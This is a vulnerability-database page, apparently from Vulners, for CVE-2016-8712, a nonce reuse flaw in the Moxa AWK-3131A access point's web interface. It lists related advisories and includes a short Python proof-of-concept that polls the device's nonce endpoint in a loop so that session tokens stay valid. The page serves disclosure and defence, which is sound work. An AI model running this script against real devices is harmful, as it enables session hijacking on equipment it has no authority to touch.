Lucene search
K

Moxa AWK-3131A Web Application Nonce Reuse Vulnerability(CVE-2016-8712)

🗓️ 19 Sep 2017 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 46 Views

Moxa AWK-3131A Web Application Nonce Reuse Vulnerability (CVE-2016-8712). Nonce reuse allows for session hijacking and permanent session token validity, with a proof-of-concept script to prevent nonce change

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2016-8712
13 Apr 201719:00
cve
Cvelist
CVE-2016-8712
13 Apr 201719:00
cvelist
EUVD
EUVD-2016-9551
7 Oct 202500:30
euvd
NVD
CVE-2016-8712
13 Apr 201719:59
nvd
Prion
Authentication flaw
13 Apr 201719:59
prion
Positive Technologies
PT-2017-9755 · Moxa · Moxa Awk-3131A Wireless Ap
13 Apr 201700:00
ptsecurity
Talos
Moxa AWK-3131A Web Application Nonce Reuse Vulnerability
10 Apr 201700:00
talos
Tenable Nessus
Moxa Web Application Nonce Reuse Vulnerability (CVE-2016-8712)
2 Aug 202300:00
nessus

                                                #!/usr/bin/python

import urllib2
import time

while True:
    nonce = urllib2.urlopen("http://<Device IP>/webNonce?time=").read()
    time.sleep(250)
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation